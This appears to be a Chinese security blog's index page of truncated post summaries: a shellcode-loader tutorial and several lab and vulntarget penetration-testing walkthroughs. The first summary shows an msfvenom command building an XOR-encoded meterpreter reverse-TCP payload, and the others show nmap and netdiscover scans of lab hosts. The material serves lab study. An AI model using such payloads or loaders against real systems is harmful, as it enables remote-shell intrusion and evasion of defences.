摘要:
1、第一个shellcode加载器 import ctypes # msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lp 阅读全文
摘要:
靶场地址: https://github.com/crow821/vulntarget 拓扑结构 信息收集 主机发现 netdiscover -r 192.168.111.0/24 -i eth0 端口扫描 nmap -A -sC -v -sV -T5 -p- --script=http-enum 阅读全文
摘要:
靶场地址:https://github.com/crow821/vulntarget 拓扑结构 信息收集 主机发现 netdiscover -r 192.168.127.0/24 -i eth0 端口扫描 nmap -A -sC -v -sV -T5 -p- --script=http-enum 1 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.238 信息收集 端口扫描 nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238 访问80端口 点击upload发现是个上传点 点击language发现存在文 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.236 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236 ``` ![image](https://img2023.cnb 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.234 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.234 ``` ![image](https://img2023.cnb 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.233 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.233 ``` ![image](https://img2023.cnb 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.228 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.228 ``` ![image](https://img2023.cnb 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.226 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.226 ``` ![image](https://img2023.cnb 阅读全文
摘要:
kali:192.168.111.111 靶机:192.168.111.215 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.215 ``` ![image](https://img2023.cnb 阅读全文